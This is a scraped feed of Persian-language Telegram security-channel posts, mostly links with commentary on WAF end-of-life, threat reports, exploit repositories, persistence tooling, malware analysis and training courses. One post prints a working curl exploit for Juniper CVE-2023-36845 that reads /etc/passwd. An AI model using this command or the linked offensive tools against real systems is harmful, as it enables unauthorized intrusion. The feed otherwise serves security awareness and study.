و پایان زندگی Modsecurity WAF در مارس ۲۰۲۴
گزینه های جایگزین در لینک زیر
https://www.openappsec.io/post/how-to-switch-to-a-modsecurity-waf-alternative-before-it-is-eol-in-march-2024?utm_source=linkedin&utm_medium=social&utm_campaign=owasp&utm_content=modsecurity
@Engineer_Computer
گزینه های جایگزین در لینک زیر
https://www.openappsec.io/post/how-to-switch-to-a-modsecurity-waf-alternative-before-it-is-eol-in-march-2024?utm_source=linkedin&utm_medium=social&utm_campaign=owasp&utm_content=modsecurity
@Engineer_Computer
open-appsec
How to switch to a ModSecurity WAF alternative before it is EOL in March 2024?
ModSecurity will reach “End of Life“ by 31.3.2024. This blog explains how open-appsec can offer an open-source, free, ML-based alternative
تحلیل هفته
استفاده از هاستینگ مجاز برای آپلود و دانلود ابزارهای آلوده
استفاده از headless browsing
https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html
@Engineer_Computer
استفاده از هاستینگ مجاز برای آپلود و دانلود ابزارهای آلوده
استفاده از headless browsing
https://www.splunk.com/en_us/blog/security/mockbin-and-the-art-of-deception-tracing-adversaries-going-headless-and-mocking-apis.html
@Engineer_Computer
Splunk
Mockbin and the Art of Deception: Tracing Adversaries, Going Headless and Mocking APIs | Splunk
Splunk's Threat Research Team delves into the attack's components, usage of tools like Mockbin and headless browsers, and provides guidance on detecting such activities.
چطور DLL ها فراخوانی میشوند و ترتیب آنها چطوری است ؟
https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order
@Engineer_Computer
https://learn.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order
@Engineer_Computer
Docs
Dynamic-link library search order - Win32 apps
You can control the specific location from which any given DLL is loaded by specifying a full path. If you don't use that method, then the system searches for the DLL at load time as described in this topic.
برخی بدافزارها و لودر ها ؛ برای اجرا نیاز به CRT یا همان کتابخانه های زمان اجرای C دارند.
نصب ویژوال استودیو یا انتقال فایل، مخاطرات خود را دارد .
استفاده از تکنیک استاتیک لینک ، هکر را قادر میسازد کد مخرب خود را در هر محیطی به اجرا بگذارد.
https://captmeelo.com/redteam/maldev/2022/10/17/independent-malware.html
@Engineer_Computer
نصب ویژوال استودیو یا انتقال فایل، مخاطرات خود را دارد .
استفاده از تکنیک استاتیک لینک ، هکر را قادر میسازد کد مخرب خود را در هر محیطی به اجرا بگذارد.
https://captmeelo.com/redteam/maldev/2022/10/17/independent-malware.html
@Engineer_Computer
Hack.Learn.Share
Writing an Independent Malware
A quick guide and high-level discussion on how to remove runtime dependencies when writing malware.
⭕️آسیب پذیری با شماره CVE-2023-29357 برای Microsoft SharePoint Server ثبت شده که اکسپلویت اون در گیت هاب در دسترس است.
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@Engineer_Computer
تارگت های زیادی در ایران آسیب پذیر هستند، لطفا بروزرسانی کنید.
https://github.com/Chocapikk/CVE-2023-29357/tree/main
#exploit #pentest #redteam
@Engineer_Computer
GitHub
GitHub - Chocapikk/CVE-2023-29357: Microsoft SharePoint Server Elevation of Privilege Vulnerability
Microsoft SharePoint Server Elevation of Privilege Vulnerability - Chocapikk/CVE-2023-29357
Weak passwords = easy targets.
83% of hacked passwords meet complexity standards, but here's the catch: attackers have BILLIONS of stolen credentials.
Is your organization prepared? Discover the defenses you need➡️ https://thehackernews.com/2023/09/are-you-willing-to-pay-high-cost-of.html
@Engineer_Computer
83% of hacked passwords meet complexity standards, but here's the catch: attackers have BILLIONS of stolen credentials.
Is your organization prepared? Discover the defenses you need➡️ https://thehackernews.com/2023/09/are-you-willing-to-pay-high-cost-of.html
@Engineer_Computer
👍1
info
AI Vulnerability Database:
An open-source, extensible knowledge base of AI failures
https://avidml.org
@Engineer_Computer
AI Vulnerability Database:
An open-source, extensible knowledge base of AI failures
https://avidml.org
@Engineer_Computer
avidml.org
Your website denoscription
❤1
#Tools #MalwareAnalysis
▪️Automated Linux Malware Analysis Sandbox
ELFEN is a dockerized sandbox for analyzing Linux (file type: ELF) malware. It leverages an array of open-source technologies to perform both static and dynamic analysis. Results are available through both the GUI and API.
@Engineer_Computer
▪️Automated Linux Malware Analysis Sandbox
ELFEN is a dockerized sandbox for analyzing Linux (file type: ELF) malware. It leverages an array of open-source technologies to perform both static and dynamic analysis. Results are available through both the GUI and API.
@Engineer_Computer
⭕️Juniper Web Device Manager - RCE
CVE-2023-36845
curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu
#CVE #Juniper
@Engineer_Computer
CVE-2023-36845
curl "http://xxxx:xxxx/?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"' -X POST
Nuceli Template :
https://templates.nuclei.sh/@yaser.cse/5kvxiVMvfLu4nLRW8EGbRu
#CVE #Juniper
@Engineer_Computer
⭕️اگر به توسعه ابزار های Persistence در ویندوز علاقه مندید ابزاری با زبان C# نوشته شده که امکاناتی دارد.
در ابتدا میتوانیم به صورت مستقل و یا execute assembly اجرا کنیم.
در ادامه تکنیک هایی که میتوان از آن استفاده کرد در این ابزار شامل موارد زیر است:
Eventviewer
Startup
Autologon
Screensaver
Powershell Profile
WMI
Schedule
Winlogon
Extension Hijacking
https://github.com/mertdas/RedPersist/tree/main
#RedTeam #persist
@Engineer_Computer
در ابتدا میتوانیم به صورت مستقل و یا execute assembly اجرا کنیم.
در ادامه تکنیک هایی که میتوان از آن استفاده کرد در این ابزار شامل موارد زیر است:
Eventviewer
Startup
Autologon
Screensaver
Powershell Profile
WMI
Schedule
Winlogon
Extension Hijacking
https://github.com/mertdas/RedPersist/tree/main
#RedTeam #persist
@Engineer_Computer
GitHub
GitHub - mertdas/RedPersist
Contribute to mertdas/RedPersist development by creating an account on GitHub.
⭕️ SQL injection to RCE
در این مقاله هکر سعی میکنه باگ sqli رو به یک باگ خطرناک تر تبدیل کنه.
پیلود های استفاده شده در این مقاله دو نوع هستند:
1. در اولین پیلود سعی داره یک شل روی سرور اپلود کنه و با استفاده از اون دستورات رو روی سرور اجرا کنه.
2. در پیلود دوم سعی میکنه با استفاده از باگی که گرفته از قبل اطلاعات حساس در فایل های روی سیستم رو بخونه.
لینک مقاله:
🔗 https://bit.ly/sqli-to-rce-sep-28-2023
#RCE #SQLi
@Engineer_Computer
در این مقاله هکر سعی میکنه باگ sqli رو به یک باگ خطرناک تر تبدیل کنه.
پیلود های استفاده شده در این مقاله دو نوع هستند:
1. در اولین پیلود سعی داره یک شل روی سرور اپلود کنه و با استفاده از اون دستورات رو روی سرور اجرا کنه.
2. در پیلود دوم سعی میکنه با استفاده از باگی که گرفته از قبل اطلاعات حساس در فایل های روی سیستم رو بخونه.
لینک مقاله:
🔗 https://bit.ly/sqli-to-rce-sep-28-2023
#RCE #SQLi
@Engineer_Computer
۶ عملی که مدیران عامل در هنگام مواجهه با خرابکاری سایبری باید انجام دهند
https://hbr.org/2023/09/6-actions-ceos-must-take-during-a-cyberattack?ab=hero-subleft-2
@Engineer_Computer
https://hbr.org/2023/09/6-actions-ceos-must-take-during-a-cyberattack?ab=hero-subleft-2
@Engineer_Computer
Harvard Business Review
6 Actions CEOs Must Take During a Cyberattack
Many have warned over the years of the growing cyber threats and some have offered thoughtful advice for how to strengthen an organization’s protection and resilience. Three questions can help determine whether enough has been done: First, have you participated…
امنیت فیزیکی
زیرساخت برق
https://covertaccessteam.substack.com/p/unplugging-cities-the-fragile-nature
@Engineer_Computer
زیرساخت برق
https://covertaccessteam.substack.com/p/unplugging-cities-the-fragile-nature
@Engineer_Computer
Substack
Unplugging Cities: The Fragile Nature of Power Substations
In the intricate weave of our modern lives, there's a constant humming in the background, one that we've almost become imperceptibly accustomed to – the power that drives our everyday existence.
❤1
۷۰ ساعت دوره آموزشی هکر قانونمند
با ۳۶ آزمایش
از سیسکو
رایگان
https://skillsforall.com/course/ethical-hacker?courseLang=en-USو
@Engineer_Computer
با ۳۶ آزمایش
از سیسکو
رایگان
https://skillsforall.com/course/ethical-hacker?courseLang=en-USو
@Engineer_Computer
🔥2
SQL authentication bypass .pdf
63.9 KB
برنامه نویسان و WAF کاران محترم
پارامتر های این مستند علیه شما برای محیط SQL استفاده میشود، توجه داشته باشید
@Engineer_Computer
پارامتر های این مستند علیه شما برای محیط SQL استفاده میشود، توجه داشته باشید
@Engineer_Computer
👍4👎1
#Video #MalwareAnalysis
▪️Reversing in action: Golang malware used in the SolarWinds attack. Part 1 and Part 2
در این دو ویدیو به تحلیل بدافزاری که در زبان برنامه نویسی Go نوشته شده بود و در حمله به SolarWinds استفاده شد، پرداخته میشود.
@Engineer_Computer
▪️Reversing in action: Golang malware used in the SolarWinds attack. Part 1 and Part 2
در این دو ویدیو به تحلیل بدافزاری که در زبان برنامه نویسی Go نوشته شده بود و در حمله به SolarWinds استفاده شد، پرداخته میشود.
@Engineer_Computer
#Tools
▪️LOLDrivers HTA Generator (Living Off The Land Drivers)
Disclaimer: This is an experimental HTA generator for LOLDrivers.
It's paramount to understand that this tool and the generated HTAs are crafted purely for educational and research goals.
Any unauthorized or malevolent use is vehemently discouraged and may be deemed illicit.
An EICAR is by default in the HTA and embedded in the driver.
@Engineer_Computer
▪️LOLDrivers HTA Generator (Living Off The Land Drivers)
Disclaimer: This is an experimental HTA generator for LOLDrivers.
It's paramount to understand that this tool and the generated HTAs are crafted purely for educational and research goals.
Any unauthorized or malevolent use is vehemently discouraged and may be deemed illicit.
An EICAR is by default in the HTA and embedded in the driver.
@Engineer_Computer
#Article #Programming
▪️Writing a Debugger From Scratch by Tim Misiak
در مجموعه جدید آموزشی آقای Tim Misiak به نام "نوشتن دیباگر از ابتدا" هدف اینه که تا جای ممکن با نحوه کار دیباگر ها آشنا بشید.
در ضمن نویسنده با زبان برنامه نویسی Rust این دیباگر رو جلو میبره.
DbgRs Part 1 - Attaching to a Process
DbgRs Part 2 - Register State and Stepping
DbgRs Part 3 - Reading Memory
DbgRs Part 4 - Exports and Private Symbols
DbgRs Part 5 - Breakpoints
@Engineer_Computer
▪️Writing a Debugger From Scratch by Tim Misiak
در مجموعه جدید آموزشی آقای Tim Misiak به نام "نوشتن دیباگر از ابتدا" هدف اینه که تا جای ممکن با نحوه کار دیباگر ها آشنا بشید.
در ضمن نویسنده با زبان برنامه نویسی Rust این دیباگر رو جلو میبره.
DbgRs Part 1 - Attaching to a Process
DbgRs Part 2 - Register State and Stepping
DbgRs Part 3 - Reading Memory
DbgRs Part 4 - Exports and Private Symbols
DbgRs Part 5 - Breakpoints
@Engineer_Computer